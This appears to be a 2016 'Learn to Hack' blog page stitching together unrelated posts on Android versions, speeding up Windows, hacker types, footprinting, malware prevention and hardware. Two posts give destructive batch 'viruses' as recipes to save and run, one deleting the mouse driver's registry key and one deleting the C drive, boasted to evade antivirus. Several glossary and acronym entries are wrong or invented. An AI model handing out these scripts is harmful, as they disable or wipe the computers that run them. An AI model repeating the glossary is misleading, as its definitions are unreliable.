Android Versions History With Release Their Date

The android smartphone is widely popular nowadays. we can see android OS bashed smartphones in everyone's hands. So history of the Android mobile operating system began in November 5, 2007. The first version of android 1.0v, was released in September 2008. Google continually developed android versions in a better way to give new experience to users. 
android Versions 1.0v and 1.1v were not released under specific code names. Android code names put on the basis of alphabetical order since 2009's Android 1.5 Cupcake, with the most recent major version being Android 8.0 Oreo, released in August 2017.
see the given table for more info about android history with release date:



How to speed up computer in very simple way.

Computer speed depends upon the Processor  and RAM as well as other factor. If we have good RAM and processor even our computer doesn't work properly as we think  Sometimes computer works slower than before and we are very upset and angry with our computer but why to angry and upset? here are the some methods to speed up your computer 

STEP 1:First of all press windows key+R, after pressing this shortcut key run command will open.
then type TEMP on command box and hit enter.

Now delete all the temporary files of computer by pressing CTRL+A ( Select All ) and DELETE key from keyboard.

****************************************************************

STEP 2 :Again press windows key+R after pressing this shortcut key run command will open.
then type %TEMP% on command box and hit enter.

Now again delete all the temporary files of computer by pressing CTRL+A ( Select All ) and DELETE key from keyboard.

****************************************************************
STEP 3 : Again press windows key+R after pressing this shortcut key run command will open.

then type PREFETCH on command box and hit enter.


and delete all the content of this folder also.


****************************************************************
STEP 3 : Again press windows key+R after pressing this shortcut key run command will open.
then type RECENT on command box and hit enter.


and delete all the content from here also


NOTE: Some files isn't delete from folder so for that files press skip and continue your work.





What is hacking? and types of Hacker.

Hacking is unauthorized access of computer and network resources. 

Hacker : Hacker is the person who hacks the system for defensive and data stealing purpose. it means black hat hacker use their hacking skills to steal data whereas white hat hackers use their skill for defensive purpose.


White Hat – White hat hackers also known as ethical hackers, White Hat hackers are the good guys of the hacking world. They help a company or organisation for defensive purpose it means they protect the company database and all the information from being hacked from hackers. Most White Hat hackers hold a college degree in IT security or computer science and must be certified to pursue a career in hacking. The most popular certification is the CEH (Certified Ethical Hacker) from the EC-Council.



Black Hat – Black hat  hackers also known as crackers, these types of hackers steal sensitive information from database or server of different organisation or company. They find banks or other companies with weak web security and steal money or credit card information. 



Gray Hat – The term "grey hat" refers to a computer hacker or computer security expert who may sometimes violate laws or typical ethical standards, but does not have the malicious intent typical of a black hat hacker. According to one definition of a grey-hat hacker, when they discover a vulnerability ( weakness of a system), instead of telling the vendor (company) how the exploit works, he or she may offer to repair it for a small fee. When one successfully gains illegal access to a system or network, he or she may suggest to the system administrator that one of his or her friends be hired to fix the problem; however, this practice has been declining due to the increasing willingness of businesses to prosecute. 



Some Technical Terms Related to Technology

  • Buying and selling products online : e-Commerce
  • Group of computers that can share resources: Network Topology
  • A program that destroy others programs: Virus
  • The service which allows user to make real time communications: Videoconferencing
  • A person destroys the web sites: Web Hacker
  • The moving of text or graphical images from one place to another :Slides
  • A type of virus which affects both application software and boot sector of disk: Boot Sector Virus
  • The artificial environment created by computer technology for entertaining user: Virtual reality ( VR)
  • A protocol used to transmitting files: FTP
  • Moral rules to be followed by computer professionals and others: Computer Ethics
  • A type of virus which infects the document of word processing package or spreadsheet package : Macro Virus
  • A method of serving and retrieving connections for real-time conferencing over computer networks: IRC - Internet Relay Chat
  •  Two way communication system but only one at a time: Telephone
  •  Set of codes used in writing programs : Programming Language
  • A device that uses computer to translate digital code into analog and vice-versa: analog-to-digital converter (ADC)
  • Software used for protecting the computer from viruses : Antivirus
  • A company that provides E-mail and internet to user: Internet Service Provider (ISP)
  • Number of bits that can be transferred per second over a given transmission media : Bitrates
  • Technique of providing governance information and services through the internet. E-governance
  • A sharpness of the images on the monitor screen determined by the number of pixels: Resolution
  • Any network device that can connect to the network and can transfer network data : Router
  • A computer in a network that utilizes the resources of others computer network: Client
  •  A self-sufficient computer that acts both as a server and a client : Peer
  • The computers on the network that does all the processing for the user. Server
  • Transferring and receiving message on the online : Chat
  • Interconnection of network : Network Topology
  • The tools used to fix the errors in the computer system. : Total system care (utility software)
  • A type of network used in a school or college : LAN
  • Global network of networks that runs TCP/IP : Internet
  • A computer network limited within a room: LAN (Local Area Network)
  • Networks of networks : Internet
  • A secret codes that gives the user to access program and system: Password
  • The rules and regulations to systematize the computer related technology: Computer ethics
  • Device used for power protection :UPS (uninterruptible power supply)
  •  A card used to connect network cable to computers: NIC ( Network interference card )
  • Making duplicate copy of file for security purpose : Backup
  • Hub or switch based network topology : Star Topology
  • A collection of programs : Software
  • Software that is basic requirement of computer : Application Software
  • A computer which uses services of network : Network Computer
  • A collections of 8 bits : 1byte
  • The physical part of computer : Hardware
  • An examples of antivirus software : Kaspersky, quickheal, avira
  • An audio output device : Speaker
  • A set of instruction : Program
  • The name of an ISP of Nepal : Ncell, NTC
  • A volatile memory : RAM
  • A pointing input device : Mouse


Some Important technological Full forms

GIGO: Garbage In Garbage Out
RAM : Random Access Memory
GUI : Graphical User Interference
NIC : Network Interference Card
CPU : Central Processing Unit
MSDOS : Microsoft Disk Operating System
WWW : World wide web
ISP : Internet Service Provider
LCD : Liquid Crystal Display
DVD : Digital Versatile Disk
ALU : Arithmetical Logical Unit
LAN : Local Area Network
USB : Universal Serial Bus
SRAM : Static Random Access Memory
COBOL : Common Business Oriented Language
BIT : Binary Digit
E-MAIL : Electronic mail
OSS : Operation Support System
URL : Uniform Resource Locator
FTP : File transfer protocol
PROM : Programmable Read Only Memory
CAD : Computer Aided Design
IBM : International Business Machine
CLS : Clear Screen
Windows XP : Windows Experience
CD : Compact Disk
OCR : Optical Character Recognition
MU : Memory Unit
HTTP : Hyper Text Transfer Protocol
HTML : Hyper Text Markup Language
CDMA : Code Division Multiple Access
QBASIC : Quick Beginner All purpose Symbolic instruction
MMS : Multimedia Messaging Service
PDF : Portable Document File
PNG : Portable Network Graphics
SEO : Search Engine Optimization
SIM : Subscriber Identity Module
SMS : Short Messaging Service
Wi-Fi : Wireless Fidelity
MBPS : Mega Byte Per Second
IMEI : International Mobile Equipment Identity
GSM : Global System for Mobile Communication
GPS : Global Positioning System
HD : High Definition
GPRS : General Pocket Radio Service
GIF : Graphics Interchange Format
GB : Giga Byte
DVI : Digital Video Interactive
DNS : Domain Name System
CSS : Cascading Style Sheets
CODEC : Coder- Decoder
CEO : Chief Executive Officer
CC : Carbon Copy
BCC : Blind Carbon Copy
BIOS : Basic Input Output System
ATM : Automated Teller Machine
AAC : Advance Audio Coding
3D :  Third Dimension
COPMPUTER : Commonly Operated Machine  Particularly  used in Technical Education Research
INTERNET: International Network
TCP: Transmission Control Protocol
IP : Internet Protocol
FAX : Facsimile
VOIP : Voice Over Internet Protocol
MAN : Metropolitan Area Network
UTP : Unshielded Twisted Pair
WAN : Wide Area Network
BPS : Bites Per Seconds
ASCII : American Code For Information Interchange
NTFS : New Technology File System                    
FAT : File Allocation Table

What is MAC address? Why it is used?


Every NIC ( Network Interface Card ) has a hardware address that's known as a MAC address. for Media Access Control. MAC address of a computer is a unique identifier assigned to network interfaces for communications at the data link layer of a network segment. MAC address can be find in your all mobile devices as well as your all laptops and computers

Is the Mac address the same as the IP address?

No, they are not same, A MAC address is given to a network adapter when it is manufactured in factory. It is hardwired or hard-coded onto your computer's network interface card (NIC) and is unique to it, it means all mobile devices and computers have their own unique MAC address which is not match to the another laptop's MAC address. 

What is meant by WiFi MAC address?

The Media Access Control (MAC) address is a unique 12-character identifier (e.g. 00:00:00:00:00:0F) for a specific piece of hardware situated on your mobile or computer devices, like the network adapter located in WiFi devices. 

What are the uses of MAC address?

MAC are specially used to sent data packets to the broadcast address ( one device to another device ), all one bits, are received by all stations on a local area network. Packets sent to a multicast address are received by all stations on a LAN that have been configured to receive packets sent to that address.

What is footprinting? Why it is used in hacking?

Foot-printing is the technique used for gathering information about computer systems and the person they belong to. To get this information of some system and a person, a hacker use various tools and technologies to get satisfied information to crack his password or system. This information is very useful to a hacker to crack a whole system. information gathering is the first step of followed by hacker to gain related information from target.

in the process of foot-printing there are different technique used to gather information from the target. this information is further used to attack the system. some are as follows :
  1. Network enumeration
  2. Network queries
  3. Operating system identification
  4. Ping sweeps
  5. Port Scanning
  6. WHOIS queries
  7. DNS queries

Whois

WHOIS is a web application (website) used to get gather information about the target website. suppose if you want to get all information of any website such as: owner of website, contact number, email id, address and so on such kind of information easily can get through https://who.is/ . WHOIS is a very large database and contains information of approximately all the websites. It can be searched by domain name. just type the domain name and search you can get all information related to the target website. 






Crawling

Crawling is the process of surfing the internet to get the required information about the target or a system. The sites surfed can include the target’s website, blogs and social networks. The information obtained by this method will be helpful in other methods too.

Search engines

Search engines such as Google can also be used to gather information about the target system. It depends you how well you know to use search engines to collect information. If used properly, the attacker can gather lots of information about a company, its career and its policies etc.

Traceroute

Information can also be gathered using the command Tracert ("traceroute"), it is used to trace a path between a user and the target system on the networks. That way it becomes clear where a request is being forwarded and through which devices. In Linux systems, the tracepath and traceroute commands are also available for doing traceroute operations.

SNS

SNS stands for Social Networking Sites. SNS can be used for footprinting. One method is to compile a list of employees working under the target organization and to look for their details which can again give information about the type and number of staff, systems and security measures which are installed. Websites such as Linkedin, Twitter etc. can be used to gather more information about the target. On the basis of the information gathered social networking can also be performed.

How to Prevent Malware From Infecting Your Computer

Computer and internet is one of the essential part of human life. it makes our every works simple and easier. by the development and rapid growing of technologies, most of the people are using that service for wrong way such as to steal information from target  through the help of different kinds of virus. virus are the program written by programmer to steal information from system . noways different kinds of viruses and malware being created so for that we have to be follow some rules to prevent from such kinds of virus attack. these are the some rules you have follow if you access computer and internet.    
1. Install Anti-Virus/Malware Software. In today generation, most of the programmer make a virus for to steal others data and hack the system so to prevent from such kind of attack. so to protect from different kinds of malware attacks we have to install antivirus software. This protection is a must-have first step in keeping you computer virus free.
2. Keep Your Anti-Virus Software Up to Date. Having protection software is the first step; maintaining it is the second. Free anti-virus software is better than nothing, but keep in mind that it’s not the best solution. Microsoft does provide a security package for “free.” It’s free in that if you have Windows on your machine, you are granted access, but you did pay for your Windows license. Many users aren’t aware of this program, but it’s actually decent protection.
3. Run Regularly Scheduled Scans with Your Anti-Virus Software. This too may seem like a no-brainer, but many of us forget to do this. Set up your software of choice to run at regular intervals. Once a week is preferred, but do not wait much longer between scans. It’s difficult to work on your computer while your anti-virus software is running. One solution is to run the software at night when you aren’t using your computer. However, we often turn off our computers at night, and so the scan never runs. Set your anti-virus software to run on a specific night, and always leave your computer running on that day. Make sure it doesn’t shut off automatically or go into hibernation mode.
4. Keep Your Operating System Current. Whether you are running Windows, Mac OS X, Linux, or any other OS, keep it up to date. OS developers are always issuing security patches that fix and plug security leaks. These patches will help to keep your system secure. Similarly, keep your anti-virus software up to date. Viruses and malware are created all the time. Your scanning software is only as good as its database. It too must be as up to date as possible.
5. Secure Your Network. Many of our computers connect to our files, printers, or the Internet via a Wi-Fi connection. Make sure it requires a password to access it and that the password is strong. Never broadcast an open Wi-Fi connection. Use WPA or WPA2 encryption. WEP is no longer strong enough as it can be bypassed in minutes by experts. It’s also a great idea to not broadcast your SSID (the name of your Wi-Fi network). You can still access it with your device, you will just have to manually type in the SSID and the password. If you frequently have guests who use your Internet, provide a guest SSID that uses a different password, just in case your friends are evil hackers.
6. Think Before You Click. Avoid websites that provide pirated material. Do not open an email attachment from somebody or a company that you do not know. Do not click on a link in an unsolicited email. Always hover over a link (especially one with a URL shortener) before you click to see where the link is really taking you. If you have to download a file from the Internet, an email, an FTP site, a file-sharing service, etc., scan it before you run it. A good anti-virus software will do that automatically, but make sure it is being done.
7. Keep Your Personal Information Safe. This is likely the most difficult thing to do on the Internet. Many hackers will access your files not by brute force, but through social engineering. They will get enough of your information to gain access to your online accounts and will glean more of your personal data. They will continue from account to account until they have enough of your info that they can access your banking data or just steal your identity altogether. Be cautious on message boards and social media. Lock down all of your privacy settings, and avoid using your real name or identity on discussion boards.
8. Don’t Use Open Wi-Fi. When you are at the local coffee shop, library, and especially the airport, don’t use the “free” open (non-password, non-encrypted) Wi-Fi. Think about it. If you can access it with no issues, what can a trained malicious individual do?
9. Back Up Your Files. The best thing you can do is back up your files—all of them. Ideally you will have your files (your data) in at least three places: the place where you work on them, on a separate storage device, and off-site. Keep your files on your computer, back them up to an external hard drive, then back them up in a different location. You can use a backup service or simply get two external hard drives and keep one at work, at a friend’s house, at a family member’s 
10. Use Multiple Strong Passwords. Never use the same password, especially on your bank account. Typically, we use the same email address or username for all of our accounts. Those are easy to see and steal. If you use the same password for everything, or on many things, and it is discovered, then it takes only seconds to hack your account. Use a strong password. Use lower case, upper case, numbers, and symbols in your password. Keep it easy to remember but difficult to guess. Do not use dates or pet names.

Disable your mouse by making simple virus.

Today i will be making a batch virus which is harm-full  for your computer because it will disable your mouse it means that your mouse doesn't work so try it your own risk now follow the following steps and start to make the virus.


 1. Open Notepad and copy below codes





rem ---------------------------------


rem Disable Mouse

set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"

reg delete %key%

reg add %key% /v Start /t REG_DWORD /d 4

rem ---------------------------------



 2. Save this file as  virus.bat ( .bat extension is necessary but name can be anything )
  3. Done you just created your virus.

Learn To Make Dangerous Virus for format your hard disk

In my previous post i had teach you guys to create virus that disable mouse and Virus to format Hard Disk. In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.



You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to make this virus?
1. Open Notepad and copy below code into it.
         
        @Echo off

         Del C:\ *.* |y

2. Save this file as virus.bat (Name can be anything but .bat is necessary)
 3. Now, running this file will delete all the content of C Drive.

Warning: Please don't try to run this file on your own computer or else it will delete all the content of your C Drive try this method by partition your hard disk on your computer. I will not be responsible for any damage done to your computer do in your own risk.

What makes a computer fast and more advance ?

There are several components within a computer that help make it faster and more powerful. Below is a list of the main hardware components that help contribute to the performance of a computer. Keep in mind that even the software running on the computer may impact the speed of a computer.

  • Processor (CPU)

The overall speed or clock speed of the computer and how fast it is capable of processing data is managed by the computer processor (CPU). The computer will be much faster and more powerful when it is capable of executing more instructions every second. For example, the first computer processor was the Intel 4004, which was only a 740 kHz processor and capable of processing approximately 92,000 instructions per second. Today's processors are multi-core GHz processors capable of processing over 100 billion instructions per second.

  • Cache

Although today's computers can execute billions of instructions every second, the processor is usually waiting for those instructions from the slower types of memory in the computer. Because RAM and the hard drive are slower than the CPU, computer processors and motherboards use cache to transfer data between the processor, memory, and components in the computer. Cache is the fastest type of memory and a computer with more L2 cache or L3 cache is capable of storing more instructions and send those instructions to the processor more efficiently.

  • Memory (RAM)

A computer with more memory (RAM) will be capable of storing more programs that are currently running in memory. If your computer runs out of memory, the computer must swap unused data stored in memory to your hard disk drive until it is needed again. By adding this extra step and because the hard drive is the slowest type of memory your computer can become much slower if it does not have enough memory.

  • BUS speed

The bus speed of the motherboard can increase or decrease the speed at which data is being transferred between all the hardware components in the computer. For example, a Front Side Bus (FSB) of 66 MHz is going to be much slower than a 400 MHz FSB. If the computer has a slow bus, the processor has to wait longer for the instructions, which makes the computer run slower.

  • Hard drive

There are several components of a hard disk drive that can make it slower or faster, which makes your computer run slower or faster overall.

For example, a hard drive can cause a computer to be slower because of the moving parts inside the hard drive, which results in slower read and write times from and to the hard drive. However, a newer and faster solid state drives (SSD) have no moving parts, which results in faster read and write times from and to the hard drive.
Below is a list of different factors that contribute to the speed of a hard drive.

An SSD drive has no movable parts, which makes it much faster than a traditional HDD.

  1. Older computers use EIDE (ATA) cables and ports to connect the drives, which have a much slower transfer rate than the SATA cables and ports used in newer computers.
  2. The RPM of the HDD is how fast the platters inside the hard drive spin. A 5400 RPM hard drive will be much slower than a 7200 RPM drive.
  3. Since cache is the fastest type of memory, a hard drive with a larger cache allows data to be handled more efficiently when it's transferred between the computer and the hard drive.
  • Video card

If you play the latest computer games, a powerful video card with its own CPU (GPU) and its own memory makes the game run faster. These types of video cards help with the performance of the computer by taking on the responsibilities of processing the 3D rendering and other complex tasks. The more powerful the video card is, the better it can render the 3D graphics and the faster it can handle the overall processing of graphics for the game.

The interface of a video card is also a contributing factor to the performance of the video card. For example, older AGP video cards are much slower than newer PCI Express video cards.
© 2016 LEARN TO HACK - ALL RIGHTS RESERVED
Design and Develop by Sahadev Katwal